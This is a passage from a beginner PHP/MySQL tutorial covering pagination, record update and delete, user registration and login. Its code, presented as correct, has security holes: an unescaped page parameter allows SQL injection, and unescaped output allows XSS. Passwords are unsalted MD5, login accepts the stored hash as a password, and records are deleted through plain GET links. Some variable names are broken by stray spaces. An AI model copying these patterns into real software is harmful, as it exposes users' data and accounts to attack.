 

You can now click the navigation links to see more records, below are more screenshots of this. 
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Below is the feedback_pg.php code, although it is quite big but it is also well commented, so follow 
it carefully. 

 

feedback_pg.php 

 

<HTML> 

<HEAD> 

<TITLE> Company Feedback </TITLE> 

</HEAD> 

<BODY> 

<b>FEEDBACK LIST</b> 

<br /> 

<br /> 

 

<?php 

//include the connection string 

include("conn.php"); 
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//the table header 

print " 

<table width=\"50%\" border=1> 

<tr> 

<td>NAME</td> 

<td>EMAIL</td> 

<td>COMMENT</td> 

<td>DATE POST</td> 

</tr> 

"; 

 

 

// how many rows to show per page 

$rowsPerPage = 3; 

 

// by default we show first page 

$pageNum = 1; 

 

// if $_GET['page'] defined, use it as page number 

if(isset($_GET['page'])) 

{ 

 $pageNum = $_GET['page']; 

} 

 

// counting the offset 

$offset = ($pageNum - 1) * $rowsPerPage; 

 

//query the table 

$query  = "SELECT * FROM feedback ORDER BY id DESC LIMIT $offset, 

$rowsPerPage"; 

 

$result= mysql_query($query, $conn) or die(mysql_error()); 

 

if (mysql_num_rows($result) == 0) { 

 print "SORRY: no data."; 

 exit; 

} 

 

//loop through the query result and print  

while($info = mysql_fetch_array($result)){ 

 

  $data_id = $info['id'];  

 $data_name = $info['name']; 

 $data_email = $info['email']; 

 $data_comment = $info['comment']; 

 $data_date = $info['date_submit']; 

 

  print "  

  <tr> 

  <td> $data_name </td> 

  <td> $data_email </td> 

  <td> $data_comment </td> 

  <td> $data_date </td> 
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  </tr> 

  "; 

} 

print "</table>"; 

 

 

// how many rows we have in database 

$query   = "SELECT COUNT(id) AS numrows FROM feedback"; 

$result  = mysql_query($query) or die('Error, query failed'); 

$row     = mysql_fetch_array($result, MYSQL_ASSOC); 

$numrows = $row['numrows']; 

 

 

// how many pages we have when using paging? 

$maxPage = ceil($numrows/$rowsPerPage); 

 

// print the link to access each page 

$self = $_SERVER['PHP_SELF']; 

$nav = ''; 

for($page = 1; $page <= $maxPage; $page++) 

{ 

 if ($page == $pageNum) 

 { 

  $nav .= " $page ";   // no need to create a link to 

current page 

 } 

 else 

 { 

  $nav .= " <a href=\"$self?page=$page\">$page</a> "; 

 }   

} 

 

// creating previous and next link 

// plus the link to go straight to 

// the first and last page 

 

if ($pageNum > 1) 

{ 

 $page = $pageNum - 1; 

 $prev = " <a href=\"$self?page=$page\">[Prev]</a> "; 

  

 $first = " <a href=\"$self?page=1\"> [First Page]</a> "; 

}  

else 

{ 

 $prev  = '&nbsp;'; // we're on page one, don't print previous 

link 

 $first = '&nbsp;'; // nor the first page link 

} 

 

if ($pageNum < $maxPage) 

{ 

 $page = $pageNum + 1; 
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 $next = " <a href=\"$self?page=$page\">[Next]</a> ";  

 $last = " <a href=\"$self?page=$maxPage\">[Last Page]</a> "; 

}  

else 

{ 

 $next = '&nbsp;'; // we're on the last page, don't print next 

link 

 $last = '&nbsp;'; // nor the last page link 

} 

 

// print the navigation link 

print $first . $prev . $nav . $next . $last; 

 

?> 

 

</BODY> 

</HTML> 

 

This pagination program is similar to the Selecting the records program, but contain more code to 
do paginating task, I bolded the main code that does the pagination.  

The first block of code is 

// how many rows to show per page 

$rowsPerPage = 3; 

 

// by default we show first page 

$pageNum = 1; 

 

// if $_GET['page'] defined, use it as page number 

if(isset($_GET['page'])) 

{ 

 $pageNum = $_GET['page']; 

} 

 

// counting the offset 

$offset = ($pageNum - 1) * $rowsPerPage; 

 

I purposely comment the code to make the explanation easy, this code include the two variables 
$rowsPerPage and $pageNum the first one specify the number of record per page, while the 
second line set the record where the paging should start from, this is usually the first page. The next 
line is a select or decision that it check if the user have click to move to another page, is this is done 
the variable $pageNum is set to the next number of the selected page, the next line does the 

counting of the offset using both variable, first it subtract 1 from $pageNum and multiply it by 
$rowsPerPage then keep the result in $offset 

   

The next line that follows is a SELECT query but with a function LIMIT to limit the result of the query 
using the variables set earlier $offset and $rowsPerPage to set the beginning and the number of 
record per page or records to retrieve, which is already set to 3 ($rowsPerPage = 3)  
 

$query  = "SELECT * FROM feedback ORDER BY id DESC LIMIT $offset, 

$rowsPerPage"; 
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The remaining bolded code starting from  // how many rows we have in database…. to 
print $first . $prev . $nav . $next . $last; have the logic, (which is well 
commented) that fetch the number of rows in the feedback table and uses the result to generate the 
navigations link for pagination. 

 

With the pagination now done we can now move to another related interesting topic. 

 

 

 

Updating records 
Let’s assume that you have a small news web portal, after posting and displaying the news well 
paginated for your user to view but then you notice a mistake in the posted news, to correct this you 
will have to update or edit that content. 

 

Updating a record is not a very easy work because it takes about four (4) steps: 

  

Step1. Have your record retrieve and displayed as we have above, with or without pagination. 

Step2.  Introduce the edit link to a page URL with a query string carrying the unique id of each record 
(this is where we will start this lesson from) 

Step3. When the edit link is clicked, you are lead to a page (usually this page will contain a form), 
here you will use the value in the query string to retrieve or SELECT the record having that unique id 
from the database and display the individual values in the form element so that you can see and edit 
or modify the data from form text fields.  

Also this page will have a hidden field which we will also use to hold the unique id, because this form 
must be posted together to the final page with the id of the record to be edited 

Step4. After editing, changing or modifying the data in the form element and submit, this data will 
now the posted or submitted to a final page that will affect the change in our database (using the 
UDATE SQL query), don’t forget the unique id (or just id) that is also submitted using the hidden 
field, is also use to know the exact record to update in our database or table.  

 

The Edit Link (Step2) 
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From step 2, Open the feedback_pg.php where we have the record displayed and paginated. Now 
locate the table heading in the code and include an extra empty table data tag <td> </td>. See the 
line (bolded) below  

….. 

//the table header 

print " 

<table width=\"50%\" border=1> 

<tr> 

<td>NAME</td> 

<td>EMAIL</td> 

<td>COMMENT</td> 

<td>DATE POST</td> 

<td> </td> 

</tr> 

";  ….. 

Now we will have to do the same at the data displaying section also, but it will not be empty as it will 
have the edit link to a page URL with a query string carrying the unique id of each record or row. See 
the link line (bolded) below. 
 
//loop through the query result and print  

while($info = mysql_fetch_array($result)){ 

 

  $data_id = $info['id'];  

 $data_name = $info['name']; 

 $data_email = $info['email']; 

 $data_comment = $info['comment']; 

 $data_date = $info['date_submit']; 

 

  print "  

  <tr> 

  <td> $data_name </td> 

  <td> $data_email </td> 

  <td> $data_comment </td> 

  <td> $data_date </td> 

<td>  

<a href=\"feedback_edit.php?id=$data_id\">Edit</a> 

</td> 

  </tr> 

"; } 

 
Let’s look at the newly introduced link, we are use to the first section of the link  <a 

href=\"feedback_edit.php , while the ?id=$data_id\"> section needs some 
explanation, the question mark ? is the character that we use in initiate the query link, the id is just a 
variable name (querystring variable -  it does not begin with the dollar $ sign), so you can use any 
name, and the remaining  =$data_id  assigns the value of the variable ($data_id) to the querystring 
variable (id). 
 

Notice that $data_id is already declared and assign a value earlier, see the line $data_id = 

$info['id']; which is the id of the record retrieve from the database. 
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THE BROWSER VIEW 

 
 
The screenshot above is what the browser view of the page will look like; now when I move my 
mouse to the Edit link of Ben Onuorah…. Record, as illustrated using the arrow with label 1, you will 
notice that the URL in the status bar of the browser, attached 10 to the id variable. 
 
    http://localhost/bws/feedback_edit.php?id=10  

 
This indicates that the id of the record being pointed to is 10 in the database, when you click the link 
this id take the number 10 to the page being linked to, in this example feedback_edit.php,  

therefore you can collect this value their using $_GET[„id‟] , this we will discuss shortly. 

 
Note: I hope you’ve already created the page feedback_edit.php, please do so if you have not, this 
page should contain a form with the elements as we have in contact.htm.  

 
BY THE WAY - Link query with multiple variable: as you’ve learnt now that the link query 

(?id=10) means the variable id is taking one value 10 to the receiving page, similarly you 
may want to pass more than one variable using the link query, let’s say I need the name and 
email as well. Below is what I should have in my source code. 

 
<a href=\"feedback_edit.php 

?id=$data_id&name=$data_name&email=$data_email\"> 

 
And the browser status view will look like: 

 
 

 

Note: in this case we introduce more variables name and email and join it using the 
ampersand (&) not question mark (?) as use in initial id variable, as usual we assign their 
respective variables $data_name and $data_email to them as we did for id. 

 
Also note that a query string is appended to the URL when we click on the link, and because 
the URL bar of a browser may have a specific limit, it is advisable to limit the number of 
variables we assign or be watch their expected value. For example I won’t advice you include 
the comment $data_comment because you cannot reassume how long it would be.  
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Note: if you had try testing this multiple variable example, please return the code to the 

initial example <a href=\"feedback_edit.php?id=$data_id\"> Edit </a> 
Then continue with the Step 3 

 

 
Editing Mode (Step3) 
Again I assumed that you already created the page feedback_edit.php, please do if you have not 
already, this page should contain a form with the elements as we have in contact.htm. 

Now when the you click on the edit link, this is what you should have in your browser 
 

 
 
These form elements are expected to show the details of the selected record, so that we can edit by 
changing this detail from here.  

 
Now let’s go to the source of feedback_edit.php and  

A. Connect of database 
B. Query or SELECT from the required table using the value from the query link  
C. Append the respective data to the form element (including the hidden field)     

 
Below is the code in my feedback_edit.php page, it contains the (A) and (B) as I listed above, I will 
introduce the (C) after explaining this code. 

 
feedback_edit.php 
<?php 

//include the connection string 

include("conn.php"); 

 

//get the from the query link 

$query_id = mysql_real_escape_string($_GET['id']); 
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//query the table using the value from the query link 

$query  = "SELECT * FROM feedback WHERE id='$query_id'"; 

$result = mysql_query($query, $conn) or die(mysql_error()); 

 

$info = mysql_fetch_array($result); 

 

 //assign the result to valriable   

$data_id = $info['id'];  

 $data_name = $info['name']; 

 $data_email = $info['email']; 

 $data_comment = $info['comment']; 

 $data_date = $info['date_submit']; 

?> 

 

<!-- THE HTML SECTION --> 

<HTML> 

<HEAD> 

<TITLE>Company Feedback</TITLE> 

</HEAD> 

<BODY> 

 

<form method="post" action="feedback_edited.php"> 

<table> 

<tr> 

<td colspan="2"><b>UPDATE REDCORD</b></td> 

</tr> 

<tr> 

<td><strong> Name</strong></td> 

<td> 

<input name="names" type="text" id="names" size="30" /> 

</td> 

</tr> 

<tr> 

<td><strong>Email</strong></td> 

<td> 

<input name="email" type="text" id="email" size="30" /> 

</td> 

</tr> 

<tr> 

<td></td> 

<td><textarea name="comment" cols="30" rows="5" 

id="comment"></textarea> 

</td> 

</tr> 

<tr> 

<td></td> 

<td> 

<input type="submit" name="Submit" value="Submit" /> 

</td> 

</tr> 

</table> 

</form> 
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</BODY> 
</HTML> 

 

This code is similar to the one we use in listing the record in the last exercise; except that the record 
is not in while loop, this is not necessary because the ID is expected to retrieve just a single record. 

 
I bolded the only line and area that need further explanation 
 
$query_id = mysql_real_escape_string($_GET['id']); 

 
The PHP $_GET[ ] special variable is use to collect the value of a query link, since the variable 
name is id (http://localhost/bws/feedback_edit.php?id=10) that is why we collect the value using 
$_GET['id'] and as we do when taken in data earlier we need to clean up the information using 

mysql_real_escape_string(), the assign it to the variable $query_id, this is what the 
bolded line above does. 

 
Now I edit the HTML section the FORM to be precise I echo the variables retrieved to the values of 
the element (echo or print may be use, I purposely use echo here), see the bolded lines below. 

 
<form method="post" action="feedback_edited.php"> 

<table> 

<tr> 

<td colspan="2"><b>UPDATE REDCORD</b></td> 

</tr> 

<tr> 

<td><strong> Name</strong></td> 

<td> 

<input name="names" type="text" id="names" value="<?php echo 

$data_name; ?>" size="30" /> 

</td> 

</tr> 

<tr> 

<td><strong>Email</strong></td> 

<td> 

<input name="email" type="text" id="email"  value="<?php echo 

$data_email; ?>" size="30" /> 

</td> 

</tr> 

<tr> 

<td></td> 

<td> 

<textarea name="comment" cols="30" rows="5" id="comment"> <?php echo 

$data_comment; ?> </textarea> 

</td> 

</tr> 

<tr> 

<td></td> 

<td> 

<!-- HIDDEN ELEMENT --> 

<input name="sel_id" type="hidden" value="<?php echo $data_id; ?>" 

/> 

<input type="submit" name="Submit" value="Submit" /></td> 
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</tr> 

</table> 

</form>    

 
Notice that the last line element type is hidden and its value is to hold the unique id of the value 
retrieve (this value would be 10 for this example as we already seen in the URL query) it is important 
we do this, because the value will be use in the UPDATE query in the page this form will be 
submitted to feedback_edited.php 
 

 <form method="post" action="feedback_edited.php"> 

 
Before we continue with the final stage feedback_edited.php where the UPDATE query would be, 
let’s see the preview of what we have done in the last exercise. 
 

feedback_edit.php 

 
With the record in editing mode (that is; seen in the form), it is easy to modify a data, simply by 
changing it. For example I decide to change “Ben” to my full “Benjamin” 

 
Before you click the submit button to update the change let’s create and program the page it will be 
posting to, that is feedback_edited.php 

 

 

Update record (Step4) 
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Please create the file feedback_edited.php if you have not done so already, and let it contain the 
code below. 

 

<?php 

//include the connection string 

include("conn.php"); 

 

// keep the form data in variable   

$name=mysql_real_escape_string($_POST['names']); 

$email=mysql_real_escape_string($_POST['email']); 

$comment=mysql_real_escape_string($_POST['comment']); 

$id=mysql_real_escape_string($_POST['sel_id']); 

 

 

//update query  

 

$sql = "UPDATE feedback SET    

         name='$name', 

  email='$email', 

  comment='$comment'  

          WHERE id= '$id'";    

 

//execute the query 

mysql_query($sql,$conn) or die(mysql_error()); 

 

//store the msg 

$msg = "Record Successfully Updated"; 

?> 

 

<!-- THE HTML SECTION --> 

<HTML> 

<HEAD> 

<TITLE>Company Feedback</TITLE> 

</HEAD> 

<BODY> 

<p><a href="feedback_pg.php">Return</a></p> 

 

<p>   

<?php 



Web Design and Programming by Ben Onuorah www.NEMSacademy.com/wdp 

440 

 

// display the msg 

if(isset($msg)){ 

 echo $msg; 

} 

?> 

   

</p> 

</BODY> 

</HTML>   

 

This program is similar to the one we use in inserting into the database (See the Insert the data 
submitted into the database page) except for the UPDATE query. 

 

$sql = "UPDATE feedback SET    

         name='$name', 

  email='$email', 

  comment='$comment'  

          WHERE id= '$id'";    

 

The variable $id, is collected from the hidden field sel_id and kept in the $id, notice the line just 
above the UPDATE query $id=mysql_real_escape_string($_POST['sel_id']); 

 

By the time I click on the submit form, the left screenshot below is what I have on my browser. 

 

 

 

That’s all, the record is updated, to confirm it I click on the Return link taken me back to 
feedback_pg.php and as shown in the screenshot below, Ben is now Benjamin. 
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So we have come to the end of the lesson, next we will be looking at how to DELETE a record. 

 

 

 

Deleting record 

 

Let’s start by opening the (feedback_pg.php) and introducing the Delete link button after the Edit 
button. I did this with the bolded line of code below. 

<HTML> 

<HEAD> 

<TITLE> Company Feedback </TITLE> 

</HEAD> 

<BODY> 

<b>FEEDBACK LIST</b> 

<br /> 

<br /> 

<?php 

//include the connection string 

include("conn.php"); 

 

//the table header 

print " 

<table width=\"50%\" border=1> 

<tr> 

<td>NAME</td> 
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<td>EMAIL</td> 

<td>COMMENT</td> 

<td>DATE POST</td> 

<td> </td> 

<td> </td> 

</tr> 

"; 

 

// how many rows to show per page 

$rowsPerPage = 3; 

 

// by default we show first page 

$pageNum = 1; 

 

// if $_GET['page'] defined, use it as page number 

if(isset($_GET['page'])) 

{ 

 $pageNum = $_GET['page']; 

} 

 

// counting the offset 

$offset = ($pageNum - 1) * $rowsPerPage; 

 

//query the table 

$query  = "SELECT * FROM feedback ORDER BY id DESC LIMIT $offset, 

$rowsPerPage"; 

 

$result= mysql_query($query, $conn) or die(mysql_error()); 

 

if (mysql_num_rows($result) == 0) { 

 print "SORRY: no data"; 

 exit; 

} 

 

//loop through the query result and print  

while($info = mysql_fetch_array($result)){ 

 

  $data_id = $info['id'];  

 $data_name = $info['name']; 

 $data_email = $info['email']; 
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 $data_comment = $info['comment']; 

 $data_date = $info['date_submit']; 

 

  print "  

  <tr> 

  <td> $data_name </td> 

  <td> $data_email </td> 

  <td> $data_comment </td> 

  <td> $data_date </td> 

  <td> <a href=\"feedback_edit.php?id=$data_id\"> Edit 

</td> 

  <td> <a href=\"feedback_delete.php?id=$data_id\"> Delete 

</td> 

  </tr> 

  "; 

} 

print "</table>"; 

 

 

// how many rows we have in database 

……. The remaining paginating code 

?> 

 

</BODY> 

</HTML> 

 

Just like we did with Edit we added <td> </td> to the heading, see the first bolded line above, then 
the Delete link this is done the same way we did the Edit.  

 

<td> <a href=\"feedback_delete.php?id=$data_id\"> Delete </td> 

 

The browser preview will look like what we have below, and the query link will show in the browser 
status bar when you move our mouse to the link as we did with Edit. 
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Now create the page feedback_delete.php and let it have the code below. 

feedback_delete.php 

<?php 

//include the connection string 

include("conn.php"); 

 

//To be executed after the confirmation of the delete 

if(isset($_GET['final_del'])){ 

 //get the id from the confirmation link 

 $query_id = mysql_real_escape_string($_GET['final_del']); 

 

 //the deleting query 

 $query  = "DELETE FROM feedback WHERE id = '$query_id'"; 

 $result = mysql_query($query) or die(mysql_error()); 

  

 //redirect back after deleting 

 header("Location:feedback_pg.php"); 

} 

?> 

<!-- THE HTML SECTION --> 

<HTML> 

<HEAD> 
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<TITLE>Company Feedback</TITLE> 

</HEAD> 

<BODY> 

Are you sure you want to delete the record  

 

<?php print "<a href=\"feedback_delete.php?final_del=$_GET[id]\"> 

YES </a>"; ?>  

&nbsp;&nbsp;&nbsp; 

<a href="feedback_pg.php"> NO </a> 

 

</BODY> 

</HTML> 

 

 

BY THE WAY-Delete with caution: When I was learning programming and I do a DELETE, the 
deleting goes straight and wipe out the record, later my client now ask that they sometimes 
delete an important record by mistake, this makes me to device this new algorithm for 
handling this task by first warning the user to confirm their delete.   

And that is what I use in the DELETE code above. 

 

BY THE WAY-Reducing number of pages: this delete program unlike the former ones, where 
I have to collect a data in another page let’s say contact.php and submit / process in another 
let’s say contact_process.php both operation is done in one page, but you will have to use 

if(isset(var)){ code block } to check within the page if the variable (var) is set 
or hold a data, to determine if the code block within the if{ } statement will be process. This is 
important because PHP process your code sequentially and you don’t want this code block be 
process until you click a submit button or link to activate this operation. This is the approach I 
use for the DELETE program above. Let’s explain the program. 

 

I bolded the block of code (which come first) and a line of code (which come second) in the DELETE 
program which need some explanation, unlike the other program the second (line of code) actually 
come first in execution and it call the first (block of code) to take action. 

 

 

 

 

 

 

BELOW IS AN ILLUSTRATED SCREENSHOT OF THE FLOW OF THIS OPERATION 
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HERE IS THE EXPLANATION of the flow 

A.  From the list of record in feedback_pg.php, I click the Delete link in front of the ddd… 
record, as shown in the screenshot below. 

 

 

 

B.  this will lead me to the next page feedback_delete.php where I get the warning message 
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 If I click NO I will be returned to back to the previous page (feedback_pg.php) and if YES the DELETE 

Query will be executed (gotten from the program in the feedback_delete.php page, here is the 

DELETE program segment)  

 

if(isset($_GET['final_del'])){ 

 //get the id from the confirmation link 

 $query_id = 

mysql_real_escape_string($_GET['final_del']); 

 

 //the deleting query 

 $query  = "DELETE FROM feedback WHERE id = 

'$query_id'"; 

 $result = mysql_query($query) or die(mysql_error()); 

  

 //redirect back after deleting 

 header("Location:feedback_pg.php"); 

} 

 

As said earlier, the querystring attached to the YES link makes the code block with the …. 

if(isset($_GET['final_del'])){  

To be executed, using the id $query_id to delete that particular record….  

DELETE FROM feedback WHERE id = '$query_id' 

After the deletion then you will be redirected to the previous page feedback_pg.php  

 

//redirect back after deleting 

 header("Location:feedback_pg.php"); 

 

… with the record deleted. 
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Creating an authentication 
Authentication is fairly common in web technology this day, where web-based application are 
becoming widely use by different categories of users, for example you may have a web application 
that grant certain privilege to a particular user, such as Top level management or Administrative 
staff and deny low-level staff such as supervisor or marketer some of this administrative privileges. 

If my example is too corporate, let’s take facebook for an example, it is authentication that allow 
facebook to secure your account, using the registration and login you did, to track and manage your 
activities, for example when you login you can access you message, chat history, wall update, friends 
list and more, all this and more is made possible using an authentication system. 

Because most of the web application or software you will be building will involve some 
authentication (such as register, login and session tracking) that is why I decided to put this chapter 
together to explain how this is done. I hope you enjoy it. 

 

Creating Tables 

As usual we will start with the Data layer of this program. From our last example  we have only one 
table ‘feedback’ in our bgdb database, so we need to create two more tables ‘user’ and ‘dairy’, 
below is the SQL CREATE queries follow by the screenshots. 

 

User table 

CREATE TABLE IF NOT EXISTS `user` ( 

  `id` int(10) NOT NULL AUTO_INCREMENT, 

  `user_name` varchar(200) NOT NULL, 

  `password` varchar(200) NOT NULL, 

  `name` varchar(255) NOT NULL, 

  `email` varchar(200) NOT NULL, 

  PRIMARY KEY (`id`) 

) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=1; 
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This table will be used to store the user registration record. 

 

 

Dairy table 

This dairy table will be use by this simple dairy program we will be developing; to help users to keep 
their personal information (just like the paper dairy). The essence of this example is to demonstrate 
how to use authentication and session to keep track of individual information; so that when they 
login they will see only their dairy or information. 

 

CREATE TABLE IF NOT EXISTS `dairy` ( 

  `id` int(10) NOT NULL AUTO_INCREMENT, 

  `user_id` varchar(255) DEFAULT NULL, 

  `title` varchar(255) DEFAULT NULL, 

  `content` text, 

  `date_submit` datetime DEFAULT NULL, 

  PRIMARY KEY (`id`) 

) 
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Now that we are done with the tables or data layer, let’s look at the files and functions that the 
authentication application will have. 

 

 

I purposely use the abbreviation (auth_) to name all the files use for the authentication. As you can 
see in the screenshot above, the files are:  

auth_change_pw.php 

auth_login.php 

auth_register.php 

auth_register_confirm.php 
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auth_test.php 

auth_welcome.php 

 

Note: please create files with this name in preparation for this exercise.  

Now let’s study how this works. 

 

The Login page auth_login.php should have been the best place start, but I would like us to start 
with the Register page auth_register.php so that we can have some registered users first, to do the 
login.  

 

auth_register.php 

I type the URL http://localhost/bws/auth_register.php on my browser to access this page, below is 
the screenshot followed by the source code. 

 

auth_register.php 

 

 

The Source code 

<html> 

<head> 

<title>Authentication</title> 

</head> 

<body> 

<b>REGISTER</b> 

<br /> 

<a href="auth_login.php">Login</a><br /> 
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<form method="post" action="auth_register_confirm.php"> 

<table width="50%" border="0" > 

<tr> 

<td colspan="2"></td> 

</tr> 

<tr> 

<td>USER ID</td> 

<td><input name="user_name" type="text" id="user_name" /></td> 

</tr> 

<tr> 

<td>PASSWORD</td> 

<td><input name="password" type="password" id="password" /></td> 

</tr> 

<tr> 

<td>Re-enter password</td> 

<td><input name="password2" type="password" id="password2" /></td> 

</tr> 

<tr> 

<td>Name</td> 

<td><input name="name" type="text" id="name" /></td> 

</tr> 

<tr> 

<td>Email Address </td> 

<td><input name="email" type="text" id="email" /></td> 

</tr> 

<tr> 

<td>&nbsp;</td> 

<td><input type="submit" value="REGISTER"  /></td> 

</tr> 

</table> 

</form> 

</body> 

</html> 

 

The source of this page is purely HTML, I only bolded the form action to point your attention to the 
page it is submitting to, which is auth_register_confirm.php 

 

auth_register_confirm.php 
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When the Registration form above submits to this page, several task is done to cleanup, validates 
and encrypt the password before the actual insertion (registration) is done. Below is the source 
code. 

 

auth_register_confirm.php 

<?php  

include("conn.php"); //connect to the database 

 

//Cleanup the input 

$user_name=mysql_escape_string($_POST['user_name']); 

$password=mysql_escape_string($_POST['password']); 

$password2=mysql_escape_string($_POST['password2']); 

$email=mysql_escape_string($_POST['email']); 

$name=mysql_escape_string($_POST['name']); 

 

//encode the password 

$password_encode=md5($password); 

 

// validate for empty field... 

if((!$user_name)||(!$password)||(!$email)||(!$name)){ 

 $msg="<font color=\"red\">Sorry USER ID, PASSWORD,  

      EMAIL and NAME field must be provided, please  

     <a href=\"javascript:history.back()\">Try Again!</a></font>";  

}else{  

 // validate to check if the password and renter password  

// is same 

 if($password != $password2){ 

  $msg="<font color=\"red\">Sorry your PASSWORD is not  

the same as the RE-ENTER PASSWORD, please  

         <a href=\"javascript:history.back()\">Try Again!</a> 

</font>";    

 }else{  

  //check if the username or password is already use 

  $sql = "SELECT * FROM user WHERE user_name = '$user_name'  

          OR password = '$password_encode'"; 

  $sql_query = mysql_query($sql, $conn) or  

die(mysql_error()); 

  

  //if exist.... 

  if (mysql_num_rows($sql_query) >= 1) { 
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$msg="<font color=\"red\">Sorry a user already use 

the USER ID or PASSWORD you intend using,  

please change the login ID and                                              

<a href=\"javascript:history.back()\">Try 

Again!</a></font>";             

}else{ 

  //if not existing.... then register 

$sql="INSERT INTO user VALUES ('','$user_name', 

'$password_encode','$name', '$email')";  

    

        mysql_query($sql,$conn) or die(mysql_error());  

   $msg="<font color=\"blue\"><b>Thank you! <br />  

                 your registration was successfull... </b>  

   <a href=\"auth_login.php\">LOGIN HERE!</a></font>";  

  }   

 } 

} 

?>                   

 

<html> 

<head> 

<title>Authentication</title> 

</head> 

<body> 

<p><b>REGISTER</b></p> 

<p> 

<?php  

if (isset($msg)){ 

 print $msg; 

} 

?> 

</p> 

</body> 

</html> 

 

As I said earlier this page source code, does many things, some you already know (through the 
former exercises and the comment lines that accompany this code) but they are many we’ve not 
discuss yet. So I took time to bold the important lines of code that need some explanation. 

 

First: 

//encode the password 
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$password_encode=md5($password); 

 

We use MD5 encryption technology to encrypt or encode the password, this is to improve the 
security of the password for example you type dan as your password and a stranger wonder into 
your database here is what he will see (the screenshot below). 

 

 

Second: 

// validate for empty field... 

if((!$user_name)||(!$password)||(!$email)||(!$name)){ 

 

This ensure that the user or visitor enter value into all the four textbox before submitting, the 
exclamation (!) mark means NOT while (||) means OR. Therefore this statement says (in simple 
English word)  

IF $user_name is NOT supplied OR $password is NOT supplied OR $email is NOT supplied OR $name 
is NOT supplied THEN…. 

 

Because these four variables ($user_name, $password, $email and $name) are already assigned, or 
expected to have or hold values above, however if the IF condition above is TRUE, that is someone 
omit any field when registering then the line of code that follows is executed. (See the code below) 

 

$msg="<font color=\"red\">Sorry USER ID, PASSWORD, EMAIL and NAME  

field must be provided, please  

<a href=\"javascript:history.back()\">Try Again!</a></font>";  

 

This code store an error or warning message into the variable $msg, to be displayed at the HTML 
section of this page.  

 

Note the Try Again! Link <a href=\"javascript:history.back()\"> contains a 
JavaScript function that returns us to the register page when we omit any of the validated field AND  
keep all the data we entered in the field unclear. See the screenshots example 
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When we submit the form we will get the error message below… 

 

 

The Try Again! Link contains the JavaScript URL, (explained above) so when you click the link it takes 
you back to the Registration form with all you data intact (not wiped out as a normal page link 
would have) except for the Password field. See the screenshot below. 

  

Using this JavaScript function in linking back and keeping our data intact can make a user life easy 
when filling a form, although you may not appreciate much here because we have only few (5) fields 
in this form, assuming we have 20 fields and just because of one mistake a user is force to reenter all 
the field, he or she may be discourage from registration and ultimately not using your website or 
application. 
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Third 

After the last IF statement we just explained, then comes the else statement that executes if the 
user supply all the fields. The block of code in this else statement does quite a lot of things, causing it 
to have two nested if..else statement again. (I indented this if statements to make it easy for you to 
understand the structure) 

 

The third line of code I bolded is:  
 

// validate to check if the password and renter password  

// is same 

if($password != $password2){ 

 

Just like the last one, this is another validation, as the comment above states, it verify IF the 
Password ($password) and Re-enter password ($password2) values are NOT (!=) the same. If 
this condition is TRUE then the line that follows is executed (similar to the error in last example I 
explained) but if the condition is not TRUE the block of code in ELSE statement is executed. 

 

Let’s assume I entered james and jame for both Password and Re-enter password field and submit, I 
will receive an error message. See the screenshots below. 

 

 

After this, comes the else statement leading us to Fourth bolded line. 
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Fourth 

//check if the username or password is already use 

$sql = "SELECT * FROM user WHERE user_name = '$user_name' OR 

password = '$password_encode'"; 

$sql_query = mysql_query($sql, $conn) or die(mysql_error()); 

 

This line within the else statement, actually check if the User ID or Password you supplied is already 
registered by another user. 

We are not new to SELECT query, but here we use the WHERE clause to compare our user id entry 
with the ones available in the user table, WHERE user_name = '$user_name and we also use the OR 
to check for the Password also OR password = '$password_encode'. 

 

This means that if an existing or registered member has already used either the User ID OR Password 
you are about to use…. Then the query $sql_query will contains record or data (the number of time 
the User ID or Password have been used) and the next IF statement will be TRUE  

Below is the Fifth bolded line 

 

Fifth 

 

//if use.... 

if (mysql_num_rows($sql_query) >= 1) { 

 

This line that follows the SELECT query check if the number of record found in 
mysql_num_rows($sql_query)  (that is; the number of time the User ID or Password you are 
about to use have been used ) is equal to or above >= one(1)  

 

IF this condition is TRUE, that means the User ID or Password you are about to use have been use, 
therefore you will receive an error message similar to the first the two. See the screenshots below. 
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ELSE 

The registration will be completed (INSERT) and you will be directed to the login page. 

The screenshot below shows the flow without error. 
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Note: This Registration algorithm (that is register if record does not exist) is the opposite of the Login 
algorithm (that is, login if record if exists).  We will be treating the Login next.  

 

Now that we are through with the Registration let’s move on to Login 

 

I took time to illustrate the flow of how this Login area works below. 
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auth_login.php 

The login page is an important interface, it suppose to serve as the homepage of the authentication 
application from here user can Register and Change Password. Below is the code and screenshot for 
this page. 

 

auth_login.php 

<?php  

session_start(); 

session_destroy();  
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?> 

<html> 

<head> 

<title>Authentication</title> 

</head> 

<body> 

<?php 

if (isset($_GET['msg'])){ 

 print $_GET['msg']; 

} 

?> 

<form method="post" action="auth_test.php">  

  <table width="30%" border="0"> 

    <tr> 

      <td colspan="2"><b>LOGIN</b> </td> 

    </tr> 

    <tr> 

      <td>USER ID</td> 

      <td><input name="user_name" type="text" /></td> 

    </tr> 

    <tr> 

      <td>PASSWORD</td> 

      <td> 

        <input name="password" type="password" id="password" /> 

      </td> 

    </tr> 

    <tr> 

      <td align="right"><a href="auth_register.php">Register</a> |  

      <a href="auth_change_pw.php">Change  Password</a></td> 

      <td><input type="submit" name="Submi" value="LOGIN" /></td> 

    </tr> 

  </table> 

</form> 

</body> 

</html> 
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This page source code needs little or no explanation, except the two blocks of PHP code (which I 
bolded above), the first block is use to LOGOUT a user. (See code below) 

<?php  

session_start(); 

session_destroy();  

?> 

 

It actually destroys the session, we will see the logout link when we login and this link, leads us back 
to this login page auth_login.php and the session is destroyed, this will prevent unauthorized users 
from gaining access to your account or dairy. 

 

The second block handles error message if authentication was not successful. (See code below) 

<?php 

if (isset($_GET['msg'])){ 

 print $_GET['msg']; 

} 

?> 

 

The message is sent from auth_test.php which is the file this login form is posting to. Notice the 
action line of the form. (See the code below)  

<form method="post" action="auth_test.php">  

 

 

auth_test.php 

Below is the source code of the page auth_test.php (where the Login form is post to) 

 

auth_test.php 

<?php 

//create and issue query 

include("conn.php"); 
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$user_id = mysql_escape_string($_POST['user_name']); 

$user_pw = mysql_escape_string($_POST['password']); 

$pswd = md5($user _pw);  

 

$sql = "SELECT * FROM user WHERE user_name='$ user _id' AND 

(password = '$user_pw' OR password = '$pswd')"; 

$result = mysql_query($sql, $conn) or die(mysql_error());  

  

    

if (mysql_num_rows($result) == 1) { 

//if user is registered, get his record  

$info = mysql_fetch_array($result); 

  

$id = $info['id'];  

  $user_name = $info['user_name']; 

  $password = $info['password']; 

  $name = $info['name']; 

  $email = $info['email']; 

       

  //Create session and store the records to it 

  session_start(); 

     

